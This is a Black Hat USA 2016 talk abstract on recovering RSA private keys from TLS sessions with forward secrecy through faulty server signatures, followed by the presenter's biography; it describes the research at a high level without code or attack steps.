Recover a RSA Private Key from a TLS Session with Perfect Forward Secrecy

Presented at Black Hat USA 2016, Aug. 3, 2016, 3 p.m. (50 minutes).

They always taught us that the only thing that can be pulled out from a SSL/TLS session using strong authentication and latest Perferct Forward Secrecy ciphersuites is the public key of the certificate exchanged during the handshake - an insufficient condition to place a MiTM attack without to generate alarms on the validity of the TLS connection and certificate itself. Anyway, this is not always true. In certain circumstances it is possible to derive the private key of server regardless of the size of the used modulus. Even RSA keys of 4096 bits can be factored at the cost of a few CPU cycles and computational resources. All that needed is the generation of a faulty digital signature from server, an event that can be observed when occurring certain conditions such as CPU overheating, RAM errors or other hardware faults. Because of these premises, devices like firewall, switch, router and other embedded appliances are more exposed than traditional IT servers or clients. During the talk, the author will explain the theory behind the attack, how common the factors are that make it possible and his custom pratical implementation of the technique. At the end, a proof-of-concept, able to work both in passive mode (i.e. only by sniffing the network traffic) and in active mode (namely, by participating directly in the establishment of TLS handshakes), will be released.


Presenters:

  • Marco Ortisi - ENCS (European Network for CyberSecurity)
    Marco Ortisi works as Senior Penetration Tester in ENCS (European Network for Cyber Security) where he is fully involved in increasing the security of European critical infrastractures such as energy grids, and reducing the gap with the classical IT systems. Netizen since 1996, he has literally grown up on "bread and vulnerability's research," a fascinating field leading him to continuosly study new attack techniques and at the same time to develop alternative defense methods. Prior to this role at ENCS, Marco worked as Independent Penetration Tester and Security Consultant on different sectors (telco, governmental, utility, banking, pharmaceutical, financial, etc...) by helping to improve the IT security posture of several big companies and organizations operating in EMEA (Europe and Middle East).

Links:

Similar Presentations: